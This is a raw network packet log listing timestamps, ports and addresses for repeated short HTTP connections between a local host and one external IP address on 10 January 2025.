Jan 10, 2025 09:00:49.041168928 CET	50174	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.047342062 CET	80	50174	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:49.047430038 CET	50174	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.047570944 CET	50174	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.049885988 CET	50175	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.052670956 CET	80	50174	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:49.052733898 CET	50174	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.054759979 CET	80	50175	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:49.054822922 CET	50175	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.054909945 CET	50175	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.059736013 CET	80	50175	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:49.968141079 CET	80	50175	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:49.968398094 CET	80	50175	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:49.968596935 CET	50175	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.968596935 CET	50175	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:49.973551035 CET	80	50175	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:50.086781025 CET	50176	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.091969013 CET	80	50176	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:50.092039108 CET	50176	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.092173100 CET	50176	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.094506979 CET	50177	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.097229958 CET	80	50176	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:50.097289085 CET	50176	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.099458933 CET	80	50177	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:50.099519014 CET	50177	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.099673033 CET	50177	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:50.104643106 CET	80	50177	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.007128954 CET	80	50177	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.008035898 CET	80	50177	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.008097887 CET	50177	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.008131027 CET	50177	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.012950897 CET	80	50177	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.130884886 CET	50178	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.135984898 CET	80	50178	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.136094093 CET	50178	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.136209011 CET	50178	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.141242027 CET	80	50178	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.141289949 CET	50178	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.191190004 CET	50179	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.195962906 CET	80	50179	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:51.196047068 CET	50179	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.196167946 CET	50179	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:51.201014042 CET	80	50179	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.118796110 CET	80	50179	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.118839025 CET	80	50179	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.118937016 CET	50179	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.119054079 CET	50179	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.123853922 CET	80	50179	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.243716002 CET	50180	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.248799086 CET	80	50180	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.248975992 CET	50180	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.249222040 CET	50180	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.254189014 CET	80	50180	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.254348040 CET	50180	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.254672050 CET	50181	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.259677887 CET	80	50181	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:52.259771109 CET	50181	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.259918928 CET	50181	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:52.265017033 CET	80	50181	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.182415962 CET	80	50181	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.182473898 CET	80	50181	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.182708979 CET	50181	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.184468031 CET	50181	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.189318895 CET	80	50181	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.297302008 CET	50182	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.302733898 CET	80	50182	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.302894115 CET	50182	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.303036928 CET	50182	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.304956913 CET	50183	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.308038950 CET	80	50182	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.308120012 CET	50182	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.309919119 CET	80	50183	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:53.310029030 CET	50183	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.310172081 CET	50183	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:53.315028906 CET	80	50183	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.243438959 CET	80	50183	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.243546963 CET	80	50183	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.243752956 CET	50183	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.243851900 CET	50183	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.248801947 CET	80	50183	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.360109091 CET	50184	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.365226030 CET	80	50184	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.365308046 CET	50184	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.365565062 CET	50184	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.367721081 CET	50185	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.370531082 CET	80	50184	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.370600939 CET	50184	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.372663975 CET	80	50185	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:54.372747898 CET	50185	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.372854948 CET	50185	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:54.377927065 CET	80	50185	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.295144081 CET	80	50185	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.295420885 CET	80	50185	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.295527935 CET	50185	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.295527935 CET	50185	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.300438881 CET	80	50185	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.419023991 CET	50186	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.424061060 CET	80	50186	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.424171925 CET	50186	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.424355030 CET	50186	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.429306984 CET	80	50186	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.429384947 CET	50186	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.472784996 CET	50187	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.477715969 CET	80	50187	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:55.477802038 CET	50187	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.477962017 CET	50187	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:55.482758999 CET	80	50187	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.418008089 CET	80	50187	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.418148994 CET	80	50187	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.418220997 CET	50187	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.418275118 CET	50187	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.423122883 CET	80	50187	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.532820940 CET	50188	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.538062096 CET	80	50188	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.538167953 CET	50188	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.538253069 CET	50188	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.540258884 CET	50189	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.543205023 CET	80	50188	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.543286085 CET	50188	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.545144081 CET	80	50189	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:56.545241117 CET	50189	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.545388937 CET	50189	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:56.550204039 CET	80	50189	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.476118088 CET	80	50189	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.476447105 CET	80	50189	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.476526022 CET	50189	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.476579905 CET	50189	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.481527090 CET	80	50189	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.592437029 CET	50190	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.597841024 CET	80	50190	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.597943068 CET	50190	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.598057985 CET	50190	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.600039005 CET	50191	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.603198051 CET	80	50190	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.603250027 CET	50190	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.604950905 CET	80	50191	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:57.605021954 CET	50191	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.605137110 CET	50191	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:57.609996080 CET	80	50191	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.553601027 CET	80	50191	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.553664923 CET	80	50191	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.553816080 CET	50191	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.553816080 CET	50191	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.558729887 CET	80	50191	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.667689085 CET	50192	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.672740936 CET	80	50192	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.672842979 CET	50192	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.672924042 CET	50192	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.674887896 CET	50193	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.678076029 CET	80	50192	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.678152084 CET	50192	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.679850101 CET	80	50193	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:58.679927111 CET	50193	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.680043936 CET	50193	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:58.684897900 CET	80	50193	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.657731056 CET	80	50193	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.657804966 CET	80	50193	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.657850027 CET	50193	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.657944918 CET	50193	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.662695885 CET	80	50193	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.773017883 CET	50194	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.778095961 CET	80	50194	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.778280973 CET	50194	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.778311968 CET	50194	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.780136108 CET	50195	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.783377886 CET	80	50194	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.783457994 CET	50194	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.784966946 CET	80	50195	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:59.785022020 CET	50195	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.785111904 CET	50195	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:59.789860010 CET	80	50195	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.713434935 CET	80	50195	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.713613987 CET	80	50195	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.713886023 CET	50195	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.713886023 CET	50195	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.718837023 CET	80	50195	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.827398062 CET	50196	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.832720995 CET	80	50196	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.832834005 CET	50196	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.832936049 CET	50196	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.834665060 CET	50197	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.837953091 CET	80	50196	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.838032961 CET	50196	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.839618921 CET	80	50197	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:00.839703083 CET	50197	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.839787960 CET	50197	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:00.844657898 CET	80	50197	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.769407988 CET	80	50197	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.769877911 CET	80	50197	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.769958019 CET	50197	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.769958019 CET	50197	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.774887085 CET	80	50197	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.883409023 CET	50198	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.888513088 CET	80	50198	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.888600111 CET	50198	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.888650894 CET	50198	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.890227079 CET	50199	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.893758059 CET	80	50198	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.893810987 CET	50198	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.895091057 CET	80	50199	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:01.895145893 CET	50199	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.899786949 CET	50199	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:01.904608965 CET	80	50199	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.843728065 CET	80	50199	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.844106913 CET	80	50199	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.844187021 CET	50199	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.844343901 CET	50199	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.849153042 CET	80	50199	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.958751917 CET	50200	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.963710070 CET	80	50200	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.963922977 CET	50200	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.963922977 CET	50200	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.965775967 CET	50201	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.969249010 CET	80	50200	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.970738888 CET	80	50201	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:02.970819950 CET	50201	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.970911026 CET	50201	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.972095966 CET	50200	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:02.975750923 CET	80	50201	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:03.896851063 CET	80	50201	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:03.897593975 CET	80	50201	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:03.897784948 CET	50201	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:03.897785902 CET	50201	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:03.902738094 CET	80	50201	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.010540009 CET	50202	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.015533924 CET	80	50202	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.015631914 CET	50202	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.015759945 CET	50202	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.017496109 CET	50203	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.020797968 CET	80	50202	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.020854950 CET	50202	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.022361994 CET	80	50203	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.022439957 CET	50203	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.022536993 CET	50203	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.027417898 CET	80	50203	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.939035892 CET	80	50203	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.939285040 CET	80	50203	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:04.939418077 CET	50203	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.942044020 CET	50203	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:04.946898937 CET	80	50203	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:05.053615093 CET	50204	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.058557987 CET	80	50204	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:05.058664083 CET	50204	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.058768988 CET	50204	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.060468912 CET	50205	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.063761950 CET	80	50204	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:05.063831091 CET	50204	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.065386057 CET	80	50205	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:05.065462112 CET	50205	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.065542936 CET	50205	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:05.070312977 CET	80	50205	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.028060913 CET	80	50205	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.028125048 CET	80	50205	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.028192997 CET	50205	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.028304100 CET	50205	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.033164024 CET	80	50205	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.143260956 CET	50206	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.148483992 CET	80	50206	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.148600101 CET	50206	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.148718119 CET	50206	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.150477886 CET	50207	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.153708935 CET	80	50206	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.153773069 CET	50206	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.155406952 CET	80	50207	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:06.155476093 CET	50207	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.155574083 CET	50207	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:06.160388947 CET	80	50207	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.124660969 CET	80	50207	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.124857903 CET	80	50207	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.125032902 CET	50207	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.125034094 CET	50207	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.129956961 CET	80	50207	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.239203930 CET	50208	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.244376898 CET	80	50208	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.248665094 CET	50208	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.248851061 CET	50208	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.250669003 CET	50209	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.253727913 CET	80	50208	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.255589008 CET	80	50209	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:07.255724907 CET	50208	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.255758047 CET	50209	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.255984068 CET	50209	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:07.260902882 CET	80	50209	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.205307961 CET	80	50209	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.205363989 CET	80	50209	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.205516100 CET	50209	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.205516100 CET	50209	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.210480928 CET	80	50209	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.319576025 CET	50210	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.324667931 CET	80	50210	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.324763060 CET	50210	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.324893951 CET	50210	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.326915979 CET	50211	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.329898119 CET	80	50210	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.329967022 CET	50210	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.331938028 CET	80	50211	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:08.332025051 CET	50211	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.332134962 CET	50211	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:08.336945057 CET	80	50211	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.279850006 CET	80	50211	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.279948950 CET	80	50211	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.280147076 CET	50211	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.280258894 CET	50211	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.285206079 CET	80	50211	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.397654057 CET	50212	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.402580976 CET	80	50212	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.402667999 CET	50212	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.402784109 CET	50212	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.404763937 CET	50213	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.407864094 CET	80	50212	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.408080101 CET	50212	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.409598112 CET	80	50213	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:09.409672022 CET	50213	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.409817934 CET	50213	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:09.414592028 CET	80	50213	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.443205118 CET	80	50213	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.443264961 CET	80	50213	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.443295956 CET	80	50213	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.443695068 CET	50213	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.444905996 CET	50213	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.450120926 CET	80	50213	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.560796022 CET	50214	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.565843105 CET	80	50214	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.565934896 CET	50214	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.566020966 CET	50214	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.567806959 CET	50215	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.571048021 CET	80	50214	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.571120024 CET	50214	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.574506998 CET	80	50215	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:10.574587107 CET	50215	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.574687958 CET	50215	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:10.579539061 CET	80	50215	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.519539118 CET	80	50215	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.519620895 CET	80	50215	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.520009041 CET	50215	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.520009041 CET	50215	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.525378942 CET	80	50215	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.637193918 CET	50216	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.642343998 CET	80	50216	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.642446041 CET	50216	80	192.168.2.4	166.62.27.188
